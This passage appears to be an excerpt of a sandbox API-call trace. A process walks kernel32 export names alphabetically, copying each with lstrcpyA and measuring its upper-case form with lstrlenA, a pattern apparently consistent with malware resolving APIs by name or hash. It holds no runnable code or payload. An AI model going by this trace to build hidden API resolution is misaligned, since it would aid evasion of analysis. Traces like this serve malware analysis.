(lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.736] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.736] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.736] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.736] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.736] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.736] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.736] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.736] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.736] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.736] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.736] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.736] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.736] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.736] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.736] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.737] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.737] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.737] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.737] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.737] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.737] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.737] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.737] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.737] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.737] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.737] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.737] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.737] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.737] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.737] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.737] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.737] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.737] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.737] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.737] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.737] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.737] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.737] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.737] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.737] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.737] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.737] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.737] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.737] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.737] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.737] lstrlenA (lpString="BEEP") returned 4 [0079.737] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.737] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.737] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.737] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.737] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.738] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.738] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.738] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.738] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.738] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.738] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.738] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.738] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.738] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.738] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.738] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.738] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.738] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.738] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.738] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.738] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.738] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.738] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.738] lstrlenA (lpString="CANCELIO") returned 8 [0079.738] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.738] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.738] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.738] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.738] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.738] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.738] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.738] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.738] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.738] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.738] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.738] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.738] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.738] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.738] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.738] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.738] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.738] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.739] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.739] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.739] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.739] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.739] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.739] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.739] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.739] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.739] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.739] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.739] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.739] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.739] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.739] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.739] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.739] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.739] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.739] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.739] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.739] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.739] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.739] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.739] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.739] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.739] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.739] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.739] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.739] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.739] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.739] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.739] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.739] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.739] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.739] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.739] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.739] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.739] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.740] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.740] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.740] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.740] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.740] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.740] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.740] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.740] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.740] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.740] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.740] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.740] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.740] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.740] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.740] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.740] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.740] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.740] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.740] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.740] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.740] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.740] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.740] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.740] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.740] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.740] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.740] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.740] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.740] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.740] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.740] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.740] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.740] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.740] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.740] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.740] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.741] lstrlenA (lpString="COPYFILEA") returned 9 [0079.741] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.741] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.741] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.741] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.741] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.741] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.741] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.741] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.741] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.741] lstrlenA (lpString="COPYFILEW") returned 9 [0079.741] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.741] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.741] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.741] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.741] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.741] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.741] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.741] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.741] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.741] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.741] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.741] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.741] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.741] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.741] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.741] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.741] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.741] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.741] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.741] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.741] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.741] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.741] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.741] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.741] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.742] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.742] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.742] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.742] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.742] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.742] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.742] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.742] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.742] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.742] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.742] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.742] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.742] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.742] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.742] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.742] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.742] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.742] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.742] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.742] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.742] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.742] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.742] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.742] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.742] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.742] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.742] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.742] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.742] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.742] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.742] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.742] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.742] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.742] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.742] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.742] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.742] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.743] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.743] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.743] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.743] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.743] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.743] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.743] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.743] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.743] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.743] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.743] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.743] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.743] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.743] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.743] 